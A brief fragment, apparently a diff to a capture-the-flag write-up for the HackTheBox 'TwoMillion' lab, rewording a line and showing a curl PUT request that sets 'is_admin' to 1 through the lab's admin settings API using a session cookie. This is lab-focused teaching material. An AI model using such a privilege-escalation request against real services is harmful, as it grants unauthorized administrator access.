TheLeopard65

 }

-• Finally, After correctly configuring all the required paramters, the tester was successfully able to modify its user to be an admin user.
+• After correctly configuring all required paramters, tester was successfully able to modify its user to be an admin user.

 └─$ curl -X PUT http://2million.htb/api/v1/admin/settings/update --cookie "PHPSESSID=pg6a4v8pzabqupin2hte5fnces" --header "Content-Type: application/json" --data '{"email": "test@2million.htb", "is_admin": '1'}' | jq